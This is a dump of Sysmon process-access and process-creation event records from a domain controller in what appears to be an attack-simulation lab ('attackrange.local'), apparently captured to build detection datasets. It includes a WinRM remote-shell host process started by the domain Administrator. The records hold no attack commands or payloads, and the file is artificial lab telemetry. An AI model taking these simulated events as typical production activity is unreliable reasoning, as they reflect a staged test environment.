10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E21-5F80-7200-000000007F01}4000C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7200-000000007F01}4000C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.880{733EE690-3E21-5F80-7200-000000007F01}4000C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3E19-5F80-2608-040000000000}0x408260HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7100-000000007F01}1300C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E21-5F80-7100-000000007F01}1300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7100-000000007F01}1300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.822{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KE